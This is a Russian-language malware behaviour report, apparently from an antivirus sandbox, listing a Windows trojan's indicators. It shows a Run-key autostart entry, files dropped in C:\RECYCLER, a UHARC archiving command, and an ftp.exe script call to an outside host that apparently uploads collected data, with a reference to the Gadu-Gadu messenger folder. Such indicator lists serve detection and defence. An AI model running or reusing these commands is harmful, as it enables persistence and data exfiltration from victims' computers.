Техническая информация
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'Win32' = 'C:\recycler\run.exe'
- 'C:\RECYCLER\win16.exe'
- 'C:\RECYCLER\run.exe'
- 'C:\RECYCLER\UHARC.EXE' a -r+ -ed -pr -mm+ -o+ -mx file !uharc.exe
- '<SYSTEM32>\ftp.exe' -s:C:\recycler\win.txt xxx69h4x.c0.pl
- '%WINDIR%\regedit.exe' /s C:\recycler\win32.reg
- '<SYSTEM32>\wscript.exe' "C:\recycler\start.vbs"
- %HOMEPATH%\Gadu-Gadu
- C:\RECYCLER\win32.reg
- C:\RECYCLER\UHA$0000.$$$
- %TEMP%\~1.bat
- C:\RECYCLER\win.txt
- C:\RECYCLER\run.exe
- C:\RECYCLER\win32.bat
- C:\RECYCLER\UHARC.EXE
- C:\RECYCLER\start.vbs
- C:\RECYCLER\win16.exe
- %TEMP%\~1.bat
- C:\RECYCLER\win32.reg
- C:\RECYCLER\start.vbs
- C:\RECYCLER\win32.bat
- C:\RECYCLER\UHARC.EXE
- C:\RECYCLER\11291.zip
- C:\RECYCLER\win.txt
- C:\RECYCLER\file.uha в C:\RECYCLER\11291.zip
- C:\RECYCLER\file.uha в C:\RECYCLER\file.uha
- C:\RECYCLER\UHA$0000.$$$ в C:\RECYCLER\file.uha
- 'localhost':1037
- 'xx###h4x.c0.pl':21
- DNS ASK xx###h4x.c0.pl
- ClassName: 'RegEdit_RegEdit' WindowName: '(null)'
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'
- ClassName: 'EDIT' WindowName: '(null)'